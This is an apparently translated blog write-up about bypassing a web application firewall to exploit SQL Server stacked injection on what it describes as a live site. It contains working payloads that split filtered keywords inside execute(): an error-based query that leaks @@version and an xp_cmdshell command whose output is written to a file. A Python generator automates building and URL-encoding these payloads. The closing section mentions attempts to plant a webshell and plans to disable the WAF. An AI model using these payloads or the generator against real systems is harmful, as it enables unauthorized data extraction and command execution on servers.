0x00 Preface
The previous bypass was too simple to pull any data or gain a foothold. This time the bypass is continued until data is actually retrieved.
0x01 Process
Still the same site as last time. A quick test confirms that injection is present.
Then the usual keywords are tried: and, exec, union select, select <number> ... all of them are filtered.
It turns out that the execute function is not filtered: the dog (the WAF) shows no interception, so this function can be used.
execute('sql statement')    // execute() takes its SQL statement as a string, so a transformed string can be passed in to bypass the WAF
Verify it locally first.
Some variants:
This time it is a SQL Server stacked injection and the page does not display query results, so the idea is to make the stacked statement throw an error and leak the data through the error message (error-based injection). Converting @@version to int fails, and the failing value is echoed in the conversion error:
execute('select convert(int,@@version)') --a
Of course the statement still has to be transformed, otherwise it is intercepted because of the select keyword:
execute('sel'%2b'ect convert(int,@@version)') --a    // in URL encoding %2b is +, so this reads as 'sel' + 'ect', which T-SQL concatenates back to select before execute() runs it
Because execute() evaluates its argument as a string expression, any filtered keyword can be split this way so the WAF never sees it whole. Retrieving data or running arbitrary SQL statements then becomes much easier.
The same trick runs xp_cmdshell. Its output cannot be echoed through an error, but it can be redirected to a file or written into a table:
execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt') --a    // the double backslash in the path is filtered, so it is split the same way
The page returning an error does not matter; the WAF did not intercept. Check whether 1.txt contains the command output.
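As an added example (not code from the original post), the following Python helper generalizes the two payloads above: it splits every blacklisted keyword into 'xx'+'yy' halves inside execute(), percent-encodes only the + so the URL decoder does not turn it into a space, and runs a simulated keyword blacklist over the result to confirm nothing is left whole. The helper names, the blacklist contents and the word-boundary matching (exec filtered but execute allowed, as the post reports) are assumptions of this example, not a description of the real WAF.

```python
"""Build execute('...'+'...') payloads that split blacklisted keywords.

Added example for the technique described on the page. Function names and the
blacklist are assumptions; they do not come from the original post or any tool.
"""
import re

# Constructed blacklist: the keywords the post reports as filtered, plus the
# doubled backslash that was filtered in the xp_cmdshell output path.
FILTERED = ["select", "exec", "union", "and", "\\\\"]


def _pattern(kw: str) -> re.Pattern:
    """Compile one blacklist entry.

    Alphabetic keywords get word boundaries, so 'exec' does not match 'execute'
    (assumption modelled on the post: exec is blocked, execute is not).
    Non-alphabetic entries such as the double backslash match literally.
    """
    body = re.escape(kw)
    if kw.isalpha():
        body = r"\b" + body + r"\b"
    return re.compile(body, re.IGNORECASE)


def split_token(token: str) -> str:
    """'select' -> "sel'+'ect": close the literal, concatenate, reopen it.

    T-SQL evaluates 'sel'+'ect' back to 'select' before execute() runs it,
    but a substring or word-boundary blacklist never sees the whole keyword.
    """
    mid = max(1, len(token) // 2)
    return f"{token[:mid]}'+'{token[mid:]}"


def break_keywords(stmt: str, blacklist=FILTERED) -> str:
    """Split every blacklisted token in stmt (case-insensitive)."""
    for kw in blacklist:
        stmt = _pattern(kw).sub(lambda m: split_token(m.group(0)), stmt)
    return stmt


def build_execute_payload(stmt: str, blacklist=FILTERED, comment: str = "--a") -> str:
    """Wrap the transformed statement in execute('...') for stacked injection.

    Single quotes inside stmt are doubled first (T-SQL string escaping), then the
    keywords are split; the trailing comment discards the rest of the original
    query.
    """
    inner = break_keywords(stmt.replace("'", "''"), blacklist)
    return f"execute('{inner}') {comment}"


def url_encode_plus(payload: str) -> str:
    """Percent-encode only what the concatenation needs.

    A raw '+' in a query string decodes to a space, which would turn
    'sel' 'ect' into two separate literals and break the trick; everything
    else is left raw, as in the post.
    """
    return payload.replace("%", "%25").replace("+", "%2b")


def waf_match(text: str, blacklist=FILTERED):
    """Simulated keyword blacklist: return the entries that still appear whole."""
    return [kw for kw in blacklist if _pattern(kw).search(text)]


if __name__ == "__main__":
    # Error-based variant: leak @@version through a conversion error.
    p1 = build_execute_payload("select convert(int,@@version)")
    # Command execution: the doubled backslashes in the path are split too.
    p2 = build_execute_payload("master..xp_cmdshell whoami > e:\\\\xx\\\\1.txt")
    for p in (p1, p2):
        print(url_encode_plus(p), "| blacklist hits:", waf_match(p))
```

The word-boundary choice in `_pattern` is the important caveat: if the real WAF matched `exec` as a plain substring, `execute` would be blocked as well, and this whole family of payloads would fail before the string concatenation ever mattered.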
0x02 Follow-up
The plan was to write a webshell, or download one from the public internet, but the server cannot reach the outside network and the WAF is still in place, so writing the shell failed. The next option is to kill the WAF, while avoiding any impact on the server.
MSSQL WAF Bypass (2)